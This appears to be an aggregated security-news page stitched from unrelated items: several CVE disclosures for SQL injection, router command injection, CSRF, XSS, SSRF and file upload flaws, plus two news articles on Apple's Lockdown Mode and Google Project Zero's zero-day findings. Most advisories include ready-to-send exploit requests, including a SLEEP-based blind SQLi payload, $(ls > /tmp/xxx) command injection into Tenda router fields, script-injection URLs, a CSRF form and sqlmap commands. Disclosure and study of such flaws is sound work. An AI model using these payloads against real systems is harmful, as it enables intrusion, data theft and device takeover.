Online Accreditation Management v1.0 was discovered to contain a SQL injection vulnerability via the USERNAME parameter at process.php.

**Online-Accreditation-Management-System-v1.0-SQLi******Online Accreditation Management System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is process.php

http://your-ip/AccreditationSystem/

Online Accreditation Management System v1.0

The USERNAME parameter in the process.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

Save the POST request package in 1.txt, and then run the sqlmap

python sqlmap.py -r 1.txt  --dbs

\[+\]POST request package

    POST /AccreditationSystem/process.php?action=loginagency HTTP/1.1
    Host: 10.211.55.3
    Content-Length: 40
    Accept: text/plain, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://10.211.55.3
    Referer: http://10.211.55.3/AccreditationSystem/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=kc1vvdqjtt94b9i5461cf4s5r2
    Connection: close
    
    USERNAME=ff%E9%8E%88%27%22%5C%28&PASS=ff
    

**In action:**

**Proof and Exploit:**

watch the video here

CVE-2022-32056: GitHub - JackyG0/Online-Accreditation-Management-System-v1.0-SQLi

Inout Homestay v2.2 was discovered to contain a SQL injection vulnerability via the guests parameter at /index.php?page=search/rentals.

**Information**

    Vulnerability Name  : Remote Blind SQL Injections in Inout Homestay
    Product             : Inout Homestay
    version             : 2.2
    Date                : 2022-05-26
    Vendor Site         : https://www.inoutscripts.com/products/inout-homestay/
    POC                 : https://github.com/bigb0x/CVEs/blob/main/Inout-Homestay-2-2-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Inout Homestay Version 2.2 suffers from time-based blind SQL injection. POST parameters "guests" is vulnerable to SQL imjection attacks.This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**Vulnerable Parameter: guests (POST)**

Vulnerability: time-based blind SQL injection in guests (POST) parameter. Vulnerabile file: index.php  

**Payload**

address\=3137 Laguna Street&guests\=1' AND (SELECT 1769 FROM (SELECT(SLEEP(5)))XPZb) AND
'ADfU'\='ADfU&indate\=01/01/1967&lat\=1&location\=1&long\=1&outdate\=01/01/1967&searchcity\=San Francisco&searchstate\=NY

  
**HTTP Post Request**

POST /index.php?page\=search/rentals HTTP/1.1
Content\-Type: application/x\-www\-form\-urlencoded
X\-Requested\-With: XMLHttpRequest
Referer: http://vlun\-host.com/
Cookie: currencyid\=10; currencycode\=BYR; language\=2; io\_lang\_code\=es
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: vlun-host.com
Connection: Keep-alive
address=3&guests=-1 \[inject\_sql\_here\]&indate=01/01/1967&lat=1&location=1&long=1&outdate=01/01/1967&searchcity=San%20Francisco&searchstate=NY

  
**POC: sqlmap command:**

python sqlmap.py \-r homestay.txt  \-p guests \--dbms=MySQL --banner --random-agent --current-db --dbs --current-user

  
**output:**

  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-22: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed[at]gmail.com

CVE-2022-32055: CVEs/Inout-Homestay-2-2-sqli.md at main · bigb0x/CVEs

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34597: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tenda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\* firmware download address:\***_ https://www.tenda.com.cn/download/detail-3225.html

• _**\* firmware download address:\***_ https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in wanparametersetting

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of simulation for Tenda AX1803 router:

**\*_**2\. Vulnerability Details\***_**

Tenda AX1803 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

\## _**\*3. Recurring loopholes and POC\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34596: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Starting with iOS 16, people who are at risk of being targeted with spyware will have some much-needed help.

The surveillance-for-hire Industry has emerged in recent years as a very real threat to activists, dissidents, journalists, and human rights defenders around the world, as vendors offer increasingly invasive and effective spyware to governments. The most sophisticated of these tools, like NSO Group's notorious Pegasus spyware, target victims' smartphones using rare and sophisticated exploits to compromise Apple's iOS and Google's Android mobile operating systems. As the situation has deteriorated for victims, activists and security experts have increasingly called for more drastic measures to protect vulnerable individuals. Now Apple has an option.

Today, Apple is announcing a new feature for its upcoming iOS 16 release called Lockdown Mode. Apple emphasizes that the feature was created for a small subset of users who are at high risk of government targeting, and it doesn't expect the feature to be widely adopted. But for those who want to use it, the feature is an alternate mode of iOS that heavily restricts the tools and services that spyware actors target to take control of victims' devices.

“This is an unprecedented step for user security for high-risk users,” Ron Deibert, director of the University of Toronto's Citizen Lab said on a call with reporters ahead of the announcement. “I believe that this will throw a wrench into their modus operandi. I expect \[spyware vendors\] to try to evolve, but hopefully, this feature will prevent some of those harms from happening down the road.”

Lockdown Mode is a separate operating system mode. To turn it on, users enable the feature in the Settings menu and then are prompted to restart their device for all of the protections and digital defenses to fully take effect. The feature imposes limitations on the leakiest parts of the operating system sieve. Lockdown Mode attempts to comprehensively address threats from web browsing, for example, by blocking many speed and efficiency features that Safari (and WebKit) use to render webpages. Users can specifically mark a certain webpage as trusted so it loads normally, but by default, Lockdown Mode imposes a host of restrictions that extend anywhere WebKit is working behind the scenes. In other words, when you load web content in a third-party app or an iOS app like Mail, the same Lockdown Mode protections will apply. 

Lockdown Mode also limits all sorts of incoming invitations and requests, unless the device has previously initiated a request. That means your friend won't be able to call you on FaceTime, for example, if you've never called them. And to take it one step further, even when you initiate an interaction with another device, Lockdown Mode only honors that connection for 30 days. If you don't talk to a particular friend for weeks after that, you'll need to reestablish contact before they can reach out to you again. In Messages—a frequent target of spyware exploitation—Lockdown Mode won't show link previews and will block all attachments with the exception of a few trusted image formats.

Lockdown Mode also strengthens other protections. For example, when a device is locked, it won't receive connections from anything physically plugged into it. And, crucially, a device that isn't already registered with one of Apple's enterprise mobile device management (MDM) programs can't be added to one of these schemes once Lockdown Mode is turned on. This means that if your company gives you a phone enrolled in the corporate MDM, it will remain active if you then enable Lockdown Mode. And the manager of your MDM can't remotely turn off Lockdown Mode on your device. But if your phone is just a regular consumer device and you put it in Lockdown mode, you won't be able to activate MDM. This is important because attackers will trick victims into enabling MDM as a way of gaining the ability to install malicious apps on their devices.

Apple says the idea of Lockdown Mode feels foreign because iOS has always been developed to offer all security protections to every user. But the company saw the necessity to take drastic action as more and more spyware victims emerged worldwide. The company says it plans to continue refining Lockdown Mode and expanding it as needed. It also added a new category to its bug bounty program to reward researchers up to $2 million for finding flaws in Lockdown Mode or total bypasses. 

The company also pledged in November to donate $10 million to research and defense related to targeted spyware. On Wednesday, Apple is announcing that this money will become a grant to the Ford Foundation's Dignity and Justice Fund. At launch, advisers for the fund will come from Access Now, Citizen Lab, the Engine Room, Amnesty International, and Apple.

“The mercenary spyware industry is facilitating the spread of authoritarian practices,” Citizen Lab's Deibert emphasizes. “I applaud Apple for developing Lockdown Mode. It will be a major blow to mercenary spyware companies.”

Targeted spyware has proved a complicated threat to counter, and the industry is only growing. But a radical new defense can only help potential targets around the world who are exposed and in dire need of resources.

Apple’s Lockdown Mode Aims to Counter Spyware Threats

It didn't have to be this way: So far 2022's tranche of zero-days shows too many variants of previously patched security bugs, according Google Project Zero.

So far this year, a total of 18 security vulnerabilities have been exploited as unpatched zero-days in the wild, according to an analysis – and half of those were preventable flaws.

According to Google's Project Zero, nine of the issues were simply variants of previously patched bugs, with four being variants of previous 2021 in-the-wild zero-day bugs. Since these are closely related to security weaknesses that have been seen before, it blows a hole in the theory that zero-day exploits are so advanced that defenders can't hope to catch them, Project Zero's Maddie Stone notes.

"\[After\] the original in-the-wild zero-day \[was\] patched, attackers came back with a variant of the original bug," she explains in a Thursday blog post. "Many of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched."

The slate of 2022 zero-days affects a wide range of platforms, including Apple iOS, Atlassian Confluence, Chromium, Google Pixel, Linux, WebKit, and, of course, Windows (including the Follina and PetitPotam vulns).

In some these cases (Windows win32k and Chromium), the proof-of-concept attack path was patched but not the root cause, so attackers could trigger the original vulnerability through a different path. In other cases, such as PetitPotam, the original vulnerability was patched but "at some point regressed so that attackers could exploit the same vulnerability again," Stone says.

"The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method," she says. "To do that effectively, we need correct and comprehensive fixes."

18 Zero-Days Exploited So Far in 2022

A vulnerability classified as problematic was found in TrueConf Server 4.3.7. This vulnerability affects unknown code of the file /admin/service/stop/. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

    TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
    
    
    Vendor: TrueConf LLC
    Product web page: https://www.trueconf.com
    Affected version: 4.3.7.12255 and 4.3.7.12219
    
    Summary: TrueConf Server is a powerful, high-quality and highly secured
    video conferencing software server. It is specially designed to work with
    up to 250 participants in a multipoint conference over LAN or VPN networks.
    TrueConf Server requires no hardware and includes client applications for
    all popular platforms, making it an easy-to-set up, unified communications
    solution.
    
    Desc: The administration interface allows users to perform certain actions
    via HTTP requests without performing any validity checks to verify the requests.
    This can be exploited to perform certain actions with administrative privileges
    if a logged-in user visits a malicious web site.
    
    Input passed via the 'redirect_url' GET parameter is not properly verified before
    being used to redirect users. This can be exploited to redirect a user to an
    arbitrary website e.g. when a user clicks a specially crafted link to the affected
    script hosted on a trusted domain.
    
    TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
    input passed via several parameters to several scripts is not properly sanitized
    before being returned to the user. This can be exploited to execute arbitrary HTML
    and script code in a user's browser session in context of an affected site.
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Apache/2.4.17 (Win32)
               PHP/5.4.41
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2017-5393
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
    
    
    01.11.2016
    
    --
    
    
    CSRF Stored XSS:
    ----------------
    
    <html>
      <body>
        <form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
          <input type="hidden" name="send&#95;invite&#95;mail" value="1" />
          <input type="hidden" name="invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="hide&#95;invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="date" value="22&#46;01&#46;2017" />
          <input type="hidden" name="time&#45;field" value="17&#58;27" />
          <input type="hidden" name="time&#95;zone" value="60" />
          <input type="hidden" name="subtype" value="3" />
          <input type="hidden" name="podiums" value="6" />
          <input type="hidden" name="cid" value="&#92;c&#92;dfa95f7e1d" />
          <input type="hidden" name="key" value="dfa95f7e1d" />
          <input type="hidden" name="topic" value="<script>alert&#40;&apos;XSS&apos;&#41;<&#47;script>" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="owner" value="" />
          <input type="hidden" name="gconf&#45;edit" value="ok" />
          <input type="hidden" name="webTtype" value="0" />
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>
    
    
    
    Reflected XSS:
    --------------
    
    http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
    http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
    
    
    
    DOM XSS:
    --------
    
    http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
    http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
    
    
    
    Open Redirect:
    --------------
    
    Request:
    
    GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
    Host: 127.0.0.1:8888
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    Response:
    
    HTTP/1.1 302 Found
    Date: Thu, 22 Sep 2016 21:15:40 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: http://www.zeroscience.mk
    Content-Length: 0
    Keep-Alive: timeout=5, max=75
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    
    
    
    CSRF Stop Web Service:
    ----------------------
    
    <html>
      <body>
        <form action="http://127.0.0.1/admin/service/stop/" method="POST">
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>

CVE-2017-20120: Offensive Security’s Exploit Database Archive

Halo CMS v1.5.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the template remote download function.

https://github.com/halo-dev/halo/

There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3. The attacker needs to enter a link that ends with a zip , such as http://127.0.0.1:40001/1.zip

**Proof of Concept**

    POST /api/admin/themes/fetching?uri=http://127.0.0.1:40000/1.zip HTTP/1.1
    Host: 127.0.0.1:8090
    Content-Length: 2
    Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Content-Type: application/json
    Origin: http://127.0.0.1:8090
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:8090/admin/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=node08slatpind75xksvtriiymt214.node0
    Connection: close
    
    {
    

  

permalink: ZipThemeFetcher.java#L43  
The destination address is not limited in the code, so it can cause ssrf vulnerability

CVE-2022-32995: There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3 in halo-dev/halo · Issue #2 · zongdeiqianxing/cve-reports

Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.

https://github.com/halo-dev/halo/

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp、html etc.

**Proof of Concept**

    POST /api/admin/attachments/upload HTTP/1.1
    Host: 127.0.0.1:8090
    Content-Length: 219
    Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
    Origin: http://127.0.0.1:8090
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:8090/admin/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
    Connection: close
    
    ------WebKitFormBoundaryFxTUuVBMVJqfHQHX
    Content-Disposition: form-data; name="file"; filename="2.jsp"
    Content-Type: application/octet-stream
    
    1<script>alert(1)</script>
    ------WebKitFormBoundaryFxTUuVBMVJqfHQHX--
    

  

permalink: AttachmentServiceImpl.java L110  
Security is not checked in the relevant code

CVE-2022-32994: Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload · Issue #1 · zongdeiqianxing/cve-reports

Tag

#webkit